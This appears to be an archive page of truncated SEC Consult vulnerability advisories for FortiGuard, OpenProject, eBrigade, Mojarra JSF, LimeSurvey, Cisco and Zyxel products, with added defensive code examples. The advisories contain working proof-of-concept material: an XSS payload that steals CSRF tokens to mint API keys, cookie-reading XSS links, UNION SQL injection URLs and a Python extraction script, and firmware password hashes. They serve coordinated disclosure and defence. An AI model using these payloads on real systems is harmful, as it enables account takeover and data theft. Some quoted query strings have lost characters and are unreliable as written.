even the URLs of HTTPS-encrypted communication are sent via this protocol,
effectively breaking the confidentiality of SSL/TLS.


**Unspecified email data** (AntiSpam feature).
We do not have any further information on what kind of information is sent by the
AntiSpam feature.


**Unspecified AntiVirus data** (AntiVirus feature).
We do not have any further information on what kind of information is sent by the
AntiVirus feature.


By **intercepting and manipulating** internet traffic an attacker can manipulate
the responses for the FortiGuard Web Filter, AntiSpam and AntiVirus features.


Proof of concept:
-
The following Python 3 script decrypts a FortiGuard message (the static XOR key
has been removed from this advisory).


```python
from itertools import cycle

def forti_xor(s1):
    # The static XOR key has been removed from this advisory. Each message
    # byte is XORed with the key, which is repeated (cycle) for the whole
    # length of the message.
    xor_key = **removed**
    message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
    return message

r1 = bytes.fromhex('6968766f606e776c2d2d21262138475c5b5a475b545e475c6b6a776b646e776c6b6a772b646e776c6b6a776b646e776c6b6a776bbadf04036b6a776c616a846f')

print(repr(forti_xor(r1)))
```

In this case the encrypted message contents are:
'\x02\x02\x01\x04\x04\x00\x00\x00FGVMEV00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00...'


Another example:
'\x02\x01\x02\x04úI\x03\x00FG100D3G\x00\x00\...x00\x00+https://v10.vortex-win.data.microsoft.com/\x00'


Vulnerable / tested versions:
-
The following FortiOS versions are affected according to the vendor:
* FortiOS 6.0.6 and below
* FortiClientWindows 6.0.6 and below
* FortiClientMac 6.2.1 and below


The security advisory of the vendor can be found at:
https://fortiguard.com/psirt/FG-IR-18-100


Vendor contact timeline:

2018-05-17: Contacting vendor through ps...@fortinet.com, sending advisory with
publi

SEC Consult SA-20191014-0 :: Reflected XSS vulnerability in OpenProject

2019-10-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20191014-0 >
===
  title: Reflected XSS vulnerability
product: OpenProject
 vulnerable version: <= 9.0.3, <=10.0.1
  fixed version: 9.0.4, 10.0.2
 CVE number: CVE-2019-17092
 impact: medium
   homepage: https://www.openproject.org
  found: 2019-09-27
 by: David Haintz (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"OpenProject is the leading open source project management software. Support
your project management process along the entire project life cycle: From
project initiation to closure."

Source: https://www.openproject.org/


Business recommendation:

Update to the latest version of OpenProject.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected by further security issues.


Vulnerability overview/description:
---
1) Reflected XSS vulnerability (CVE-2019-17092)
The project list of OpenProject lacks input validation on data that is output
inside an error message. Due to the Content Security Policy, inline
scripts/styles were not allowed and the script source was limited to 'self'.
To bypass this, a JavaScript file was added as an attachment to an existing
project. This could be used to extract the CSRF token and create a new API key.


Proof of concept:
-
1) Reflected XSS vulnerability (CVE-2019-17092)
This proof of concept consists of two steps. First, the JavaScript code to be
executed is uploaded as an attachment to satisfy the Content Security Policy of
'self'. In the second step, the uploaded JavaScript code is executed through the
reflected XSS vulnerability by using a script tag.

a) Upload JavaScript code
An attacker can upload a JavaScript file as an attachment to any project in the
default configuration. The attachment can be called directly, but will be
downloaded automatically. Since the browser does not care whether a file is
meant to be downloaded or displayed when loading it from a src attribute, an
attacker can easily use it for the reflected XSS vulnerability.

In this proof of concept the following JavaScript code was uploaded:

(async () => {
  var csrf_param = document.querySelector('meta[name=csrf-param]').content;
  var csrf_token = document.querySelector('meta[name=csrf-token]').content;

  var req = await fetch("http://$IP/my/generate_api_key", {
    "credentials": "include",
    "headers": {
      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0",
      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
      "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
      "Content-Type": "application/x-www-form-urlencoded",
      "Upgrade-Insecure-Requests": "1"
    },
    "referrer": "http://$IP/my/access_token",
    "body": "_method=post&" + csrf_param + "=" + encodeURI(csrf_token),
    "method": "POST",
    "mode": "cors"
  });

  var resp = await req.text();

  var regex = /(Your access token is:\\)(.*)(\<\/strong\>)/gm;
  var api_key = resp.match(regex)[0];
  api_key = api_key.slice(35, -9);
  alert("Generated new API key: " + api_key);
})();


This gets the CSRF token and the parameter name (since this seems to be
configurable) and sends a request to the generate_api_key functionality. After
parsing, the key is exposed in a message box, but it could be used for further
operations such as adding an administrative user.


b) Craft link
The reflected XSS vulnerability was found in the URL parameter 'sortBy' of the
path '/projects'. There an attacker may add arbitrary HTML code.

Such a link could be:
http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]]
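Both halves of the defence against this issue, added here as an example (not code from the advisory or from OpenProject): contextual output encoding of the reflected parameter, and what a `script-src 'self'` policy does and does not cover. The error-message rendering is a hypothetical stand-in for the vulnerable view; the link is the proof-of-concept URL quoted above, so the decoded payload is the real one.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The proof-of-concept link from the advisory; $IP is the advisory's placeholder.
POC_URL = ("http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/"
           "29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]]")


def sort_by_param(url: str) -> str:
    """Decode the sortBy query parameter the way the server sees it."""
    return parse_qs(urlsplit(url).query)["sortBy"][0]


def error_message_vulnerable(sort_by: str) -> str:
    """Hypothetical rendering that concatenates the raw parameter into HTML.
    This is the defect class the advisory describes, not OpenProject's view code."""
    return '<p class="error">Invalid sort criteria: %s</p>' % sort_by


def error_message_fixed(sort_by: str) -> str:
    """Same message with output encoding for an HTML text-node context."""
    return '<p class="error">Invalid sort criteria: %s</p>' % html.escape(sort_by, quote=True)


def contains_script_tag(markup: str) -> bool:
    return "<script" in markup.lower()


def script_src_self_allows(page_url: str, script_url: str) -> bool:
    """Does a CSP of script-src 'self' permit loading script_url from page_url?

    'self' matches the document's own scheme, host and port, nothing else.
    A relative URL resolves to the page's origin and is therefore allowed,
    which is why an uploaded attachment on the same origin satisfied the policy."""
    page = urlsplit(page_url)
    script = urlsplit(script_url)
    if not script.netloc:  # relative URL such as /attachments/29/test.js
        return True
    return (script.scheme or page.scheme, script.netloc) == (page.scheme, page.netloc)


if __name__ == "__main__":
    payload = sort_by_param(POC_URL)
    print("decoded parameter:", payload)
    print("vulnerable output executes script:", contains_script_tag(error_message_vulnerable(payload)))
    print("encoded output executes script:   ", contains_script_tag(error_message_fixed(payload)))
    print("'self' allows same-origin attachment:", script_src_self_allows("http://$IP/projects", "/attachments/29/test.js"))
    print("'self' allows separate upload origin:", script_src_self_allows("http://$IP/projects", "https://files.example/attachments/29/test.js"))
```

The second function explains why the policy did not help here: user-controlled files served from the application's own origin are, by definition, 'self'. Serving uploads from a dedicated origin (the last call in the demo) makes the same policy block them, independently of the output-encoding fix.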


Vulnerable / tested versions:
-
The following versions have been tested, which were the latest versions
available at the time of the test:

* 10.0.0
* 10.0.1

According to the vendor, all versions before v9.0.3 and v10.0.1 are affected.


Vendor contact timeline:

2019-10-02: Contacting vendor through secur...@openproject.com
2019-10-02: Vendor verified the vulnerabili

SEC Consult SA-20190926-0 :: Multiple SQL Injection vulnerabilities in eBrigade

2019-09-26 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190926-0 >
===
  title: Multiple SQL Injection vulnerabilities
product: eBrigade
 vulnerable version: <5.0
  fixed version: >=5.0
 CVE number: CVE-2019-16743, CVE-2019-16744, CVE-2019-16745
 impact: critical
   homepage: https://ebrigade.net
  found: 2019-06-06
 by: D. Haintz (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"eBrigade is a web application that allows the management of personnel, vehicles
and equipment of rescue centers (fire brigades), associations of first
responders and military organizations. Highly configurable, eBrigade can meet
the expectations of many other organizations. Skills management, generation of
the cover sheet according to availability. Management of the interventions and
the victims with assessment sheets rescuers. Private social network.
Notifications and alerts by email and SMS. Accounting, reporting and numerous
graphs allow precise monitoring of the organization." (translated)

Source: https://ebrigade.net/


Business recommendation:

The vendor provides a patch and users of this product are urged to immediately
upgrade to the latest version available.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security
issues.


Vulnerability overview/description:
---
1) Multiple SQL Injection vulnerabilities
Due to insufficient sanitization of user input, an authenticated attacker can
execute arbitrary SQL code in several SELECT statements. Since two of the three
vulnerable parameters are not sanitized at all and the affected scripts are
responsible for serving ICAL files, an attacker can let a user download
manipulated calendar files. Besides that, an attacker can also dump the whole
database.

The third vulnerability results from incorrect usage of sanitization functions.
This enables an attacker to manipulate the SQL query with specially crafted
requests, resulting in a blind SQL injection, as described in one of the
following vulnerabilities.

a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744)
The parameters of two links can be manipulated so any arbitrary query to any
table or database can be added to the output of the resulting calendar files
using the UNION functionality of SQL.

c) Boolean-based Blind SQL Injection (CVE-2019-16745)
The parameters of a search result can be manipulated to guess the returned
values of an arbitrary query.


Proof of concept:
-
1) Multiple SQL Injection vulnerabilities
All vulnerabilities were tested with an authenticated user with the lowest
access rights (public). The whole PoC script requires an authenticated user for
any functionality. The user is authenticated by a PHP session using the cookie
PHPSESSID (the cookie name may vary between web servers). Consequently, every
request described below requires the PHP session cookie.


a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743)

The script evenement_ical.php uses the unsanitized parameter "evenement" to
query the database. The results are written into a downloadable calendar file.
By adding a UNION statement, an attacker can extend the output with arbitrary
data of the database:

The user input is read on line 42:
 $evenement=(isset($_GET['evenement'])?$_GET['evenement']:"");

On line 88-89 it is added to the SQL statement:
 if ($evenement !="")
 $sql .= "\n and e.e_code = $evenement ";

Which is executed and fetched in line 136 and 138:
 $res = mysqli_query($dbc,$sql);
 while($row=mysqli_fetch_array($res)){

Since e_code is of type integer, the proper sanitization method would be
intval().


POC URL: 
evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
-> Version after 'LOCATION:'


POC in Python:

 import requests
 import string
 import re


 url = input("URL without file (i.e. https://localhost/ebrigade): ")
 phpsession = input("PHPSESSID: ")

 cookies = {'PHPSESSID': phpsession}

 payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--'

 print("Testing vulnerability")
 r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload),
                  cookies=cookies)

 matches = re.findall(r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE)
 print("Found version: {0}".format(matches[-1]))
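The defect and the intval()-style fix side by side, as an added example on an in-memory SQLite database (this is not eBrigade's code; apart from e_code the table and column names are assumptions, and the users table with its secret is constructed for the demo):

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed schema loosely modelled on the advisory's evenement table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE evenement (e_code INTEGER PRIMARY KEY, e_nom TEXT, e_lieu TEXT);
        INSERT INTO evenement VALUES (1, 'Training', 'Station 1');
        INSERT INTO evenement VALUES (2, 'Drill', 'Station 2');
        CREATE TABLE users (id INTEGER, login TEXT, secret TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
    """)
    return conn


BASE_SQL = "SELECT e.e_code, e.e_nom, e.e_lieu FROM evenement e WHERE 1=1"


def ical_rows_vulnerable(conn: sqlite3.Connection, evenement: str) -> list:
    """Mirrors the concatenation on lines 88-89 of evenement_ical.php:
    the raw request parameter becomes part of the SQL text."""
    sql = BASE_SQL
    if evenement != "":
        sql += "\n and e.e_code = %s " % evenement
    return conn.execute(sql).fetchall()


def ical_rows_fixed(conn: sqlite3.Connection, evenement: str) -> list:
    """Coerce to an integer (the intval() fix the advisory names) and bind it as
    a parameter, so the input can never change the shape of the query.
    Python's int() raises on junk where PHP's intval() would silently return 1;
    either way the query text itself stays constant."""
    sql, params = BASE_SQL, []
    if evenement != "":
        code = int(evenement)  # ValueError for anything that is not an integer
        sql += " and e.e_code = ?"
        params.append(code)
    return conn.execute(sql, params).fetchall()


def fixed_rejects(conn: sqlite3.Connection, evenement: str) -> bool:
    """True if the hardened lookup refuses the input instead of running it."""
    try:
        ical_rows_fixed(conn, evenement)
    except ValueError:
        return True
    return False


# UNION payload in the shape of the advisory's PoC, aimed at the constructed
# users table; a matching column count is all the attacker needs.
UNION_PAYLOAD = "1 union select id, login, secret from users--"

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable query returns:", ical_rows_vulnerable(db, UNION_PAYLOAD))
    print("hardened query rejects payload:", fixed_rejects(db, UNION_PAYLOAD))
    print("hardened query, legitimate input:", ical_rows_fixed(db, "1"))
```

Run it and the vulnerable variant returns the constructed admin secret among the calendar rows, which is the "version after LOCATION:" effect from the PoC in miniature; the hardened variant never builds a different statement.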



b) UNION SQL Injection in evenements.php (CVE-2019-16744)

The script evenements.php uses the unsanitized para

SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF

2019-09-18 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
===
  title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
 Eclipse Mojarra JSF
 vulnerable version: 2.2 & 2.3
  fixed version: 
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING
 
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING
 https://github.com/eclipse-ee4j/mojarra
 CVE number: -
 impact: Medium
   homepage: https://javaserverfaces.github.io/
  found: 2018-11-12
 by: Jean-Benjamin Rousseau (Office Zurich)
 Guillaume Crouquet (Office Zurich)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"JavaServer Faces technology simplifies building user interfaces for
JavaServer applications. Developers can build web applications by
assembling reusable UI components in a page; connecting these
components to an application data source; and wiring client-generated
events to server-side event handlers.  This project provides information
on the continued development of the JavaServer Faces specification.

JavaServer Faces (JSF) is a JCP Standard technology for authoring
component based user interfaces on the Java EE platform."

Source: https://javaee.github.io/javaserverfaces-spec/


Business recommendation:

By exploiting the vulnerability documented in this advisory, an attacker
can execute arbitrary scripts in the context of the web application in the
victim's browser. Besides performing arbitrary actions within the
application with the victim's account or manipulating the application's
interface, the attacker can potentially steal session tokens, redirect
the victim to external pages and perform attacks against their browser.

SEC Consult recommends users to implement the available patches.


Vulnerability overview/description:
---
The Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3
lacks input validation on the javax.faces.ClientWindow parameter which can
lead to reflected cross-site scripting (XSS) under certain conditions.

Mojarra JSF v2.2 and v2.3 are respectively the user interface
standards for Java EE 7 and Java EE 8.

The vulnerability is not directly exploitable in Mojarra JSF v2.2
and v2.3. However, different frameworks based on this library and having
a custom implementation of the Faces-Request HTTP headers for AJAX requests
might be affected. PrimeFaces v6.0 is one example of a vulnerable framework.

This vulnerability affects the web applications fulfilling the following
conditions:
 - Usage of a framework based on Mojarra JSF v2.2 or v2.3
 - Usage of AJAX requests in the web applications
 - Custom implementation of the Faces-Request HTTP headers for AJAX requests
 - Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter
   set to "url" in the web.xml file:

  <context-param>
    <param-name>javax.faces.CLIENT_WINDOW_MODE</param-name>
    <param-value>url</param-value>
  </context-param>


Proof of concept:
-
In this proof of concept, the tests are based on PrimeFaces v6.0,
an open source framework for JSF. Other frameworks based on
Mojarra JSF 2.2 or 2.3 might also be affected.

Step 1: Generate an AJAX request on the web application and intercept it.
---
POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1
Host: $IP
Content-Length: 405
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://$IP
X-Requested-With: XMLHttpRequest
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163
Connection: close

javax.faces.partial.ajax=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0
---

Step 2: Transpose the POST parameters into GET parameters and
build a new URL with it.

http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0


Step 3: Strip out the javax.faces.ViewState GET parameter from the URL.

http://

SEC Consult SA-20190912-0 :: Stored and reflected XSS vulnerabilities in LimeSurvey

2019-09-16 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
===
  title: Stored and reflected XSS vulnerabilities
product: LimeSurvey
 vulnerable version: <= 3.17.13
  fixed version: =>3.17.14
 CVE number: CVE-2019-16172, CVE-2019-16173
 impact: medium
   homepage: https://www.limesurvey.org/
  found: 2019-08-23
 by: Andreas Kolbeck (Office Munich)
 David Haintz (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"LimeSurvey is the tool to use for your online surveys. Whether you are
conducting simple questionnaires with just a couple of questions or advanced
assessments with conditionals and quota management, LimeSurvey has got you
covered. LimeSurvey is 100% open source and will always be transparently
developed. We can help you reach your goals."

Source: https://www.limesurvey.org/


Business recommendation:

LimeSurvey suffered from a vulnerability due to improper input
and output validation. By exploiting this vulnerability an attacker could:
1. Attack other users of the web application with JavaScript code,
   browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.

The vendor provides a patch which should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a
short spot check has been performed and additional issues are to be expected.


Vulnerability overview/description:
---
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from stored and reflected cross-site scripting
vulnerabilities, which allow an attacker to execute JavaScript code with the
permissions of the victim. In this way it is possible to escalate privileges
from a low-privileged account, e.g. to "SuperAdmin".


Proof of concept:
-
1) Stored and reflected XSS vulnerabilities
Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new survey
groups. Then create a survey group with a JavaScript payload in the title, for
example:

test

When the survey group is deleted, e.g. by an administrative user, the
JavaScript code will be executed as part of the "success" message.


Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept prints the current CSRF token cookie, which
contains the CSRF token. The parameter "surveyid" is not filtered properly:

http://$host/index.php/admin/survey?mandatory=1=xxx=xxx%22%3E%3Cimg%20
src=x%20onerror=%22alert(document.cookie)%22%3E=listquestions=question


If the URL schema is configured differently the following payload works:
http://$host/index.php?r=admin/survey=1=xxx=
xxx">=listquestions=question


Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in version 3.17.9 and the latest
version 3.17.13. It is assumed that older versions are affected as well.


Vendor contact timeline:

2019-08-29: Contacting vendor through 
https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:

https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a

https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory


Solution:
-
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release

The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released


Workaround:
---
No workaround available.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain 

SEC Consult SA-20190904-0 :: Multiple vulnerabilities in Cisco router series RV34X, RV26X and RV16X

2019-09-04 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190904-0 >
===
  title: Multiple vulnerabilities
product: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P,
 Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160,
 Cisco 160W
 vulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15
  fixed version: see "Solution"
 CVE number: -
 impact: High
   homepage: https://www.cisco.com/
  found: 2019-05-15
 by: T. Weber, S. Viehböck (Office Vienna)
 IoT Inspector
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Securely connecting your small business to the outside world is as important
as connecting your internal network devices to one another. Cisco Small
Business RV Series Routers offer virtual private networking (VPN) technology
so your remote workers can connect to your network through a secure Internet
pathway."

Source: 
https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html


Business recommendation:

We want to thank Cisco for the very quick and professional response and great
coordination. Customers are urged to update the firmware of their devices.


Vulnerability overview/description:
---
1) Hardcoded Credentials
The device contains hardcoded users and passwords which can be used to login
via SSH on an emulated device at least.

During the communication with Cisco it turned out that:
"Accounts like the 'debug-admin' and 'root' can not be accessed
from console port, CLI or webui".
Therefore, these accounts had no real functionality and cannot be used for
malicious actions.

2) Known GNU glibc Vulnerabilities
The used GNU glibc in version 2.19 is outdated and contains multiple known
vulnerabilities. The outdated version was found by IoT Inspector. One of
the discovered vulnerabilities (CVE-2015-7547, "getaddrinfo() buffer overflow")
was verified by using the MEDUSA scalable firmware runtime.

3) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.23.2 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
One of the discovered vulnerabilities (CVE-2017-16544) was verified by using
the MEDUSA scalable firmware runtime.


4) Multiple Vulnerabilities - IoT Inspector Report
Further information can be found in IoT Inspector report:
https://r.sec-consult.com/ciscoiot


Proof of concept:
-
1) Hardcoded Credentials
The following hardcoded hashes were found in the 'shadow' file of the firmware:
root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:9:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:9:7:::
[...]

The undocumented user 'debug-admin' is also contained in this file.

Starting the dropbear daemon as background process on emulated firmware:
---
# dropbear -E
# [1109]  Running in background
#
# [1112]  Child connection from :52718
[1112]  /var must be owned by user or root, and not writable by others
[1112]  Password auth succeeded for 'debug-admin' from :52718
---

Log on via another host connected to the same network. For this PoC the
password of the debug-admin was changed in the 'shadow' file.
---
[root@localhost medusa]# ssh debug-admin@ /bin/ash -i
debug-admin@'s password:
/bin/ash: can't access tty; job control turned off


BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

/tmp $
---

The 'debug-admin' user has the same privileges as 'root'. This can be
determined from the corresponding sudoers file in the firmware:
[...]
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
[...]

During the communication with Cisco it turned out that:
"Accounts like the 'debug-admin' and 'root' can not be accessed
from console port, CLI or webui".
Therefore, these accounts had no real functionality and cannot be used for
malicious actions.
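An added example, not part of the advisory, of the check a firmware reviewer would automate from the two files quoted above: parse the shadow file for accounts that still accept a password login, record the hash scheme, and cross-reference sudoers for accounts granted full privileges. The sample lines are constructed in the layout of the quoted files; the hash fields are placeholders, not the values from the advisory.

```python
import re

# Constructed sample in the layout of the firmware's shadow file. The hash
# fields are placeholders, not the values quoted in the advisory.
SHADOW_SAMPLE = """\
root:$1$cnstrctd$PLACEHOLDERHASH0000000000:15533:0:9:7:::
debug-admin:$1$cnstrctd$PLACEHOLDERHASH1111111111:15541:0:9:7:::
daemon:*:15533:0:99999:7:::
nobody:!:15533:0:99999:7:::
www-data::15533:0:99999:7:::
"""

# Constructed sudoers excerpt following the lines quoted above.
SUDOERS_SAMPLE = """\
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
"""

# crypt(3) prefixes; $1$ (MD5-crypt) is the one seen in the advisory's file.
HASH_SCHEMES = {"$1$": "md5crypt", "$2": "bcrypt", "$5$": "sha256crypt",
                "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}

# A user (not a %group, not a comment) granted ALL=(ALL) ALL, optionally NOPASSWD.
SUDO_ALL_RE = re.compile(
    r"^(?P<user>[^#%\s]\S*)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s+(?:NOPASSWD:\s*)?ALL\s*$")


def parse_shadow(text: str) -> dict:
    """Map each login name to the password field of its shadow entry."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            entries[fields[0]] = fields[1]
    return entries


def classify_password_field(field: str) -> str:
    """'locked' (no password login possible), 'empty' (login without any
    password), or the name of the hash scheme; unknown prefixes are 'other'."""
    if field == "":
        return "empty"
    if field.startswith(("*", "!")):
        return "locked"
    for prefix, name in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return name
    return "other"


def full_sudo_users(text: str) -> set:
    """Users granted ALL=(ALL) ALL in a sudoers file."""
    users = set()
    for line in text.splitlines():
        m = SUDO_ALL_RE.match(line.strip())
        if m:
            users.add(m.group("user"))
    return users


def audit_accounts(shadow_text: str, sudoers_text: str, documented: set) -> list:
    """Every account a password login could reach, with the facts a reviewer
    wants next to it: hash scheme, sudo rights, and vendor documentation."""
    sudoers = full_sudo_users(sudoers_text)
    report = []
    for login, field in sorted(parse_shadow(shadow_text).items()):
        scheme = classify_password_field(field)
        if scheme == "locked":
            continue
        report.append({"login": login, "scheme": scheme,
                       "full_sudo": login in sudoers,
                       "documented": login in documented})
    return report


if __name__ == "__main__":
    for finding in audit_accounts(SHADOW_SAMPLE, SUDOERS_SAMPLE, documented={"root"}):
        print(finding)
```

On the sample this lists root and debug-admin as password-reachable accounts with MD5-crypt hashes and full sudo, marks debug-admin as undocumented, and additionally catches the constructed www-data entry with an empty password field, a condition worth flagging in any firmware image regardless of sudoers.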

2) Known GNU glibc Vulnerabilities
GNU glibc version 2.19 contains multiple CVEs like:
CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472,
CVE-2015-5277, CVE-2015-8778, CVE-2015-87

SEC Consult SA-20190829-1 :: External DNS Requests in Zyxel USG/UAG/ATP/VPN/NXC series

2019-08-30 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190829-1 >
===
  title: External DNS Requests
product: Zyxel USG/UAG/ATP/VPN/NXC series
 vulnerable version: see "Vulnerable / tested version"
  fixed version: see "Solution"
 CVE number: -
 impact: medium
   homepage: https://www.zyxel.com
  found: 2019-06-19
 by: Thomas Weber (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.

We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml



Business recommendation:

SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.


Vulnerability overview/description:
---
1) Information Disclosure via Unauthenticated External DNS Requests
A DNS request can be made by an unauthenticated attacker to either spam a DNS
service of a third party with requests that have a spoofed origin or probe
whether domain names are present on the internal network behind the firewall.


Proof of concept:
-
1) Information Disclosure via Unauthenticated External DNS Requests
By sending the following POST request an attacker can probe for the domain
"subdomain.domain.com":
---
POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

arip=subdomain.domain.com
---

The following GET request can be used for the same purpose:
---
GET /redirect.cgi?arip=subdomain.domain.com&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
